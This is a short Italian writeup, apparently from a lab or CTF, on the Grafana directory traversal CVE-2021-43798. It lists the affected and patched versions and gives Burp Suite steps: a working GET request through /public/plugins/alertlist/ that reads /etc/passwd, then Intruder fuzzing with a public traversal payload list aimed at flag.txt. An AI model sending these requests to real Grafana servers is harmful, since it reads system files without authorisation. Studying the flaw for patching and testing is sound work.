
Exploit per directory traversal di Grafana (CVE-2021-43798) con integrazione con Burp Suite e automazione del payload per l'accesso ai file locali su istanze vulnerabili.
Le versioni di Grafana 8.0.0-beta1 fino a 8.3.0 (eccetto le versioni corrette) sono vulnerabili a directory traversal, consentendo l'accesso a file locali.
Grafana è una piattaforma open-source per il monitoraggio e l'osservabilità. Le versioni di Grafana 8.0.0-beta1 fino a 8.3.0 (eccetto le versioni corrette) sono vulnerabili a directory traversal, consentendo l'accesso a file locali. Il percorso URL vulnerabile è: <grafana_host_url>/public/plugins//, dove è l'ID del plugin per qualsiasi plugin installato. Grafana Cloud non è mai stato vulnerabile. Si consiglia agli utenti di aggiornare alle versioni corrette 8.0.7, 8.1.8, 8.2.7 o 8.3.1. L'avviso di sicurezza di GitHub contiene ulteriori informazioni sui percorsi URL vulnerabili, sulla mitigazione e sulla tempistica della divulgazione.
Utilizzo di Burp Suite
Send GET to repeater
GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1
Then send to intruder GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1
Using Sniper to ATTACK Payload copiato da github https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
Elaborazione del payload Match [{FILE}] replace with {flag.txt}